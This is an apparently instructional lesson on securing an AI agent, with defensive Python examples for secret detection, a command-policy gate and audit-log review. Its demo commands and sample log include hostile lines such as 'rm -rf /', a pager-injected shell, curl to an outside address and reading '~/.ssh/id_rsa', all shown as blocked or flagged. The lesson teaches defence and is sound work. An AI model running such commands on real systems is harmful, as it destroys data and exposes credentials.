Module 9: From Toy to System•Lesson 3 of 6
Security Basics
Your agent has access to things. Protect them.
The Threat Model
Your agent can potentially:
- Read sensitive files
- Execute arbitrary commands
- Send data to external services
- Spend money (API calls)
- Act on your behalf
Security Principles
1. Least Privilege
Give the agent only what it needs.
```yaml
# Bad: Full access
tools:
  - exec            # Can run ANY command
```
```yaml
# Better: Restricted
tools:
  - exec:
      allowlist:
        - "git *"
        - "npm *"
        - "ls *"
```
Treat a prefix allowlist like this as a floor, not a fence. `git *` still matches `git -c core.pager=... log`, and `npm *` matches `npm exec` and `npm install` (which runs package lifecycle scripts); each of those executes arbitrary code. Keep the list to subcommands that only read, and prefer a tool that matches on the parsed argument list rather than on the raw command string.
2. Never Hardcode Secrets
```yaml
# Bad
providers:
  openai:
    apiKey: "sk-abc123..."   # In version control!
```
```yaml
# Good
providers:
  openai:
    apiKey: ${OPENAI_API_KEY}   # From environment
```
Store secrets in:
- Environment variables
- .env files (gitignored)
- Secret managers
Two caveats. A key that was ever committed is burned: rewriting history does not un-leak it, so rotate it. And environment variables are inherited by every process the agent starts, so an agent with an exec tool is one `env` command away from printing them; load secrets only into the process that needs them and strip them from the environment handed to child commands.
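The loader below is an added example for this lesson, not the agent framework's own config code. It expands `${VAR}` references the way the "Good" snippet above suggests, refuses to start if a variable is unset or if the config text still contains a literal key, and strips secret-looking variables from the environment passed to child commands. The function names (`load_config`, `child_env`), the detection patterns and the two sample configs (with fake key values) are assumptions made for the example.

```python
"""Secrets handling for an agent config: expand ${VAR} from the environment,
fail closed on a missing variable, refuse config text that carries a literal
key, and scrub secrets from the environment given to child processes.

Added illustration for this lesson, not the agent framework's own loader.
Patterns, function names and the sample configs are assumptions; the key
values in the samples are fake."""
import os
import re

# Matches the lesson's `apiKey: ${OPENAI_API_KEY}` reference syntax.
ENV_REF = re.compile(r"\$\{([A-Z][A-Z0-9_]*)\}")

# Well-known credential shapes plus "apiKey: '<literal>'" (not a ${...} ref).
SECRET_PATTERNS = {
    "openai_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}\b"),
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "quoted_apikey": re.compile(r"""apiKey:\s*["'][^"'${}]+["']"""),
}

# Constructed sample configs (the key below is a fake value).
BAD_CONFIG = """providers:
  openai:
    apiKey: "sk-FAKE0000000000000000000000"   # literal key, would be committed
"""
GOOD_CONFIG = """providers:
  openai:
    apiKey: ${OPENAI_API_KEY}
"""


def find_hardcoded_secrets(text):
    """Return [(line_no, pattern_name)] for every line carrying a literal secret."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, pat in SECRET_PATTERNS.items():
            if pat.search(line):
                hits.append((n, name))
    return hits


def expand_env(text, env=None):
    """Replace ${VAR} with env[VAR]. An unset or empty variable raises, so the
    agent fails before it starts instead of running with an empty key."""
    env = os.environ if env is None else env

    def substitute(match):
        name = match.group(1)
        if not env.get(name):
            raise KeyError(f"required secret {name} is not set")
        return env[name]

    return ENV_REF.sub(substitute, text)


def load_config(text, env=None):
    """Reject config text with literal secrets, then expand the references."""
    hits = find_hardcoded_secrets(text)
    if hits:
        raise ValueError(f"hardcoded secret(s) in config at lines {hits}")
    return expand_env(text, env)


def looks_secret(name, value):
    """Heuristic: secret-ish variable name or a value shaped like a credential."""
    if re.search(r"KEY|TOKEN|SECRET|PASSWORD", name):
        return True
    return any(pat.search(value) for pat in SECRET_PATTERNS.values())


def child_env(env=None):
    """Environment to hand to commands the agent executes. Child processes
    inherit the parent's environment, so anything secret-looking is dropped."""
    env = os.environ if env is None else env
    return {k: v for k, v in env.items() if not looks_secret(k, v)}


if __name__ == "__main__":
    print("bad config hits:", find_hardcoded_secrets(BAD_CONFIG))
    print(load_config(GOOD_CONFIG, {"OPENAI_API_KEY": "sk-test-value"}))
    print("child env keys:", sorted(child_env({"PATH": "/usr/bin", "OPENAI_API_KEY": "x"})))
```

Run `find_hardcoded_secrets` over every config file in a pre-commit hook; the same patterns that stop a key from entering the repo are the ones that should strip it from a child's environment.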
3. Allowlist, Don't Blocklist
```yaml
# Bad: Trying to block bad things
channels:
  telegram:
    blocklist: [123, 456, 789]   # Will miss attackers
```
```yaml
# Good: Allow only known good
channels:
  telegram:
    allowlist: [your_user_id]    # Only you can access
```
Allowlist numeric user IDs, not @usernames: a username can be changed or released and picked up by someone else; a user ID cannot. Apply the same default-deny rule to every channel the agent listens on.
4. Confirm Destructive Actions
In AGENTS.md:
```markdown
## Safety Rules
Before any of these, ASK FOR CONFIRMATION:
- Deleting files (use trash, not rm)
- Sending external messages
- Spending money
- Modifying system config
```
These rules are instructions to the model, not enforcement: a model can be argued out of them by content it reads (a web page, an email, a file in the repo). Keep them in AGENTS.md because they shape routine behaviour, and back them with the same checks in the tool layer, so that a delete, send or payment is held for confirmation regardless of what the model decided.
5. Audit Logging
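The gate below is an added example covering both the Least Privilege allowlist above and the Confirm Destructive Actions rule here; it is not the agent framework's own exec tool. It decides ALLOW, CONFIRM or DENY from the parsed argument list rather than from a `git *` style glob, refuses shell metacharacters and leading options such as `git -c`, and holds state-changing subcommands and `rm` for a human. The policy tables, the function names (`evaluate`, `prefix_glob_allows`) and the sample commands are assumptions chosen for the example; `prefix_glob_allows` is included only to show what the string-based allowlist would have let through.

```python
"""Exec policy gate: ALLOW / CONFIRM / DENY from the parsed argument list.

Added illustration for this lesson's Least Privilege and Confirm Destructive
Actions rules, not the agent framework's own exec tool. The policy tables are
assumptions chosen for the example."""
import fnmatch
import shlex

# Characters that only make sense if the string is handed to a shell.
SHELL_META = set("();<>|&`$\n")

# program -> (subcommands that may run unattended, subcommands that need a human).
# Assumed policy: unattended subcommands only read; anything that writes,
# pushes or runs package scripts (npm test/run/install/exec) asks first.
SUBCOMMAND_POLICY = {
    "git": ({"status", "log", "diff", "show", "branch"},
            {"push", "reset", "clean", "checkout", "rebase"}),
    "npm": ({"ls", "outdated", "view"},
            {"install", "run", "test", "exec", "publish"}),
}
ALLOW_ANY_ARGS = {"ls"}    # no subcommands, read-only
ALWAYS_CONFIRM = {"rm"}    # the lesson says: use trash, not rm


def tokenize(cmd):
    """Split like a POSIX shell would, keeping ; | & ( ) < > as their own tokens."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def evaluate(cmd):
    """Return (decision, reason), decision in {"ALLOW", "CONFIRM", "DENY"}."""
    try:
        argv = tokenize(cmd)
    except ValueError as exc:            # unbalanced quotes
        return "DENY", f"unparseable command: {exc}"
    if not argv:
        return "DENY", "empty command"
    for tok in argv:
        if SHELL_META & set(tok):
            return "DENY", f"shell metacharacter in {tok!r}"
    prog, args = argv[0], argv[1:]
    if prog in ALWAYS_CONFIRM:
        return "CONFIRM", f"{prog} is destructive"
    if prog in ALLOW_ANY_ARGS:
        return "ALLOW", f"{prog} is read-only"
    if prog not in SUBCOMMAND_POLICY:
        return "DENY", f"{prog} is not allowlisted"
    # Options before the subcommand (git -c core.pager=..., git --exec-path=...)
    # change what the program does; a prefix glob cannot see them, this can.
    if not args or args[0].startswith("-"):
        return "DENY", f"{prog} needs a plain subcommand first"
    unattended, needs_human = SUBCOMMAND_POLICY[prog]
    sub = args[0]
    if sub in needs_human:
        return "CONFIRM", f"{prog} {sub} modifies state or runs scripts"
    if sub in unattended:
        return "ALLOW", f"{prog} {sub} is read-only"
    return "DENY", f"{prog} {sub} is not allowlisted"


def prefix_glob_allows(cmd, patterns=("git *", "npm *", "ls *")):
    """What the lesson's string-based allowlist would decide, for contrast."""
    return any(fnmatch.fnmatch(cmd, pattern) for pattern in patterns)


if __name__ == "__main__":
    # Constructed sample commands; 203.0.113.0/24 is a documentation range.
    for cmd in ["git status", "git -c core.pager='sh -c id' log",
                "git status; rm -rf /", "git push --force origin main",
                "npm exec -- curl http://203.0.113.5", "rm -rf build"]:
        print(f"{cmd!r:45} glob={prefix_glob_allows(cmd)!s:5} gate={evaluate(cmd)[0]}")
```

The contrast is the point: every command in the demo list passes the `git *` / `npm *` glob, while the gate lets only `git status` through unattended. Wire `evaluate` in front of the exec tool so that CONFIRM blocks until a human answers, whatever the prompt said.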
Keep logs of what the agent does:
```yaml
logging:
  level: info
  file: ./logs/agent.log
  maxSize: 10mb
  maxFiles: 5
```
Review periodically for unexpected behavior: commands you did not ask for, messages to addresses you do not recognise, spend that jumps. Write the log somewhere the agent's own tools cannot edit or truncate (a different user, or shipped off the host); an agent that can run `rm ./logs/agent.log` can erase the record you would need after a compromise.
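A periodic review is easier to keep up when it is a script. The one below is an added example for this lesson, not the framework's log format or tooling: it reads a JSON-lines audit log and flags the four things the threat model above warns about, a message from a sender outside the allowlist, data sent to an unknown destination, a burst of denied actions, and spend over budget. The event shape, the thresholds, the names (`parse_log`, `review`) and the sample log are assumptions constructed for the example.

```python
"""Audit-log review for the behaviours this lesson's threat model lists:
unexpected senders, data sent to unknown destinations, bursts of denied
actions and runaway spend.

Added illustration for this lesson, not the agent framework's real log format
or review tooling. The JSON-lines event shape, thresholds and sample log are
assumptions constructed for the example."""
import json
from datetime import datetime, timedelta

ALLOWED_SENDERS = {1001}                             # the owner's user id
KNOWN_DESTINATIONS = {"https://api.openai.com/v1"}   # where data may go
BUDGET_USD = 1.00                                    # per review window

# Constructed sample log; 203.0.113.0/24 is a documentation address range.
# The fourth line is deliberately malformed.
AUDIT_LOG = """\
{"ts": "2024-05-01T09:00:01Z", "event": "message", "channel": "telegram", "sender": 1001}
{"ts": "2024-05-01T09:00:03Z", "event": "exec", "cmd": "git status", "decision": "ALLOW"}
{"ts": "2024-05-01T09:00:09Z", "event": "llm_call", "provider": "openai", "cost_usd": 0.02}
this line is not json
{"ts": "2024-05-01T09:01:10Z", "event": "message", "channel": "telegram", "sender": 7777}
{"ts": "2024-05-01T09:01:12Z", "event": "exec", "cmd": "curl http://203.0.113.5/x", "decision": "DENY"}
{"ts": "2024-05-01T09:01:13Z", "event": "exec", "cmd": "cat ~/.ssh/id_rsa", "decision": "DENY"}
{"ts": "2024-05-01T09:01:14Z", "event": "exec", "cmd": "env", "decision": "DENY"}
{"ts": "2024-05-01T09:01:20Z", "event": "send", "to": "https://203.0.113.5/collect", "decision": "ALLOW"}
{"ts": "2024-05-01T09:02:00Z", "event": "llm_call", "provider": "openai", "cost_usd": 4.50}
"""


def parse_log(text):
    """Return (events, malformed_count). Malformed lines are counted and
    skipped, not fatal: a review must not stop because one line is damaged."""
    events, malformed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            event = json.loads(line)
            event["_ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
            events.append(event)
        except (ValueError, KeyError, TypeError, AttributeError):
            malformed += 1
    return events, malformed


def review(events, allowed_senders=ALLOWED_SENDERS,
           known_destinations=KNOWN_DESTINATIONS, budget_usd=BUDGET_USD,
           deny_burst=3, window=timedelta(seconds=60)):
    """Return [(rule, detail)] findings, in the order they were detected."""
    findings, spent, deny_times = [], 0.0, []
    for event in events:
        kind = event.get("event")
        if kind == "message" and event.get("sender") not in allowed_senders:
            findings.append(("unknown_sender", f"{event['ts']} sender={event.get('sender')}"))
        elif kind == "send" and event.get("to") not in known_destinations:
            findings.append(("unknown_destination", f"{event['ts']} to={event.get('to')}"))
        elif kind == "llm_call":
            spent += float(event.get("cost_usd", 0))
        if event.get("decision") == "DENY":
            deny_times.append(event["_ts"])
    if spent > budget_usd:
        findings.append(("over_budget", f"spent ${spent:.2f} against ${budget_usd:.2f}"))
    # Several denials inside one window: something is steering the agent.
    for i in range(deny_burst - 1, len(deny_times)):
        if deny_times[i] - deny_times[i - deny_burst + 1] <= window:
            findings.append(("deny_burst", f"{deny_burst} denials within {window} ending {deny_times[i]}"))
            break
    return findings


def run_review(text=AUDIT_LOG):
    events, malformed = parse_log(text)
    findings = review(events)
    if malformed:
        findings.append(("malformed_lines", f"{malformed} line(s) could not be parsed"))
    return findings


if __name__ == "__main__":
    for rule, detail in run_review():
        print(f"{rule:20} {detail}")
```

Run it against the rotated files as well as the live one, and treat a malformed-line count that grows as a finding in itself: a log that stops parsing mid-incident is what tampering looks like.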
Security Checklist
- API keys in environment, not config
- Allowlist for channel access
- Restricted command execution
- Confirmation for destructive actions
- Logging enabled
- Config files gitignored appropriately
- Regular log review
- Backup of workspace
If Compromised
- Stop the agent (kill the process and disconnect its channels) so it cannot act further
- Revoke its API keys immediately: spend and external actions stop with them
- Preserve the logs before anything else touches them (copy them somewhere read-only)
- Review the logs for what was executed, sent and spent
- Rotate every secret the agent could have read, not only the keys you know it used
- Audit what was accessed (files, accounts, channels)
- Fix the vulnerability before restarting